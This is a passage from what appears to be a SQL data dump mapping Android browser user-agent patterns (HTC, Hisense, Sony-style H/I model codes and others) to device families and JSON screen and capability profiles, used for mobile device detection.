Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8141) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8341) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8342) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8343) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G8441) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; G9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM 8 d) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM 8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM 9 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1901) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1903) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1911) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1913) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GM1917) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GS110) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":343,\"screenHeight\":732,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GS190) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; GX290) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Griffe T9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H3213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H3223) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H3413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4133) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4233) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H4493) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8166) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8216) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8266) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8276) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8296) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8314) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8324) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H8416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H9436) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; H9493) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HEYOU50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":753,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HLK-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HLK-L41) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HMA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HMA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HMA-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":748,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-AL00a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-LX1MEB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-LX1T) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HRY-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC 2Q55100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC Desire 19+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC One M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC U11 life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC U11 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC U11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC U12+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC_2Q4D100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTC_U-3u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HTV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HW-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HW-02L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HWV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; HWV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":771,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Hammer_Energy_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Hammer_Explorer) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Hammer_IRON_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Hisense H30 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; Hisense H30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I3213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I3223) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I4113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I4193) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":840,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I4213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I4293) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":960,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; I6_Infinity) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 9; INE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 